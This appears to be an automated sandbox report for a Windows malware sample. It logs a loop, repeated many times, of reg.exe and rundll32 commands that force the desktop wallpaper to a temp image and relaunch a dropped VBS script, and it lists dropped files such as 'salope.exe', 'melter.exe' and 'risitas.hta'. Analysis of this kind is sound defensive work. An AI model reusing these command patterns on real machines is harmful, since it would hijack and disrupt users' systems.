C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
Network
Files
C:\Users\Admin\AppData\Local\Temp\489D.tmp\489E.tmp\489F.bat
C:\Users\Admin\AppData\Local\Temp\26921.vbs
C:\Users\Admin\AppData\Local\Temp\20725.vbs
C:\Users\Admin\AppData\Local\Temp\4235.vbs
C:\Users\Admin\AppData\Local\Temp\salope.exe
C:\Users\Admin\AppData\Local\Temp\9391.vbs
C:\Users\Admin\AppData\Local\Temp\14246.vbs
C:\Users\Admin\AppData\Local\Temp\23948.vbs
C:\Users\Admin\AppData\Local\Temp\26852.vbs
C:\Users\Admin\AppData\Local\Temp\31845.vbs
C:\Users\Admin\AppData\Local\Temp\28089.bat
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD
C:\Users\Admin\AppData\Local\Temp\risitas.hta
C:\Users\Admin\AppData\Local\Temp\melter.exe
\??\PIPE\lsarpc
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_A252AE74B42D4524ACB318EAE2BE4DE9.dat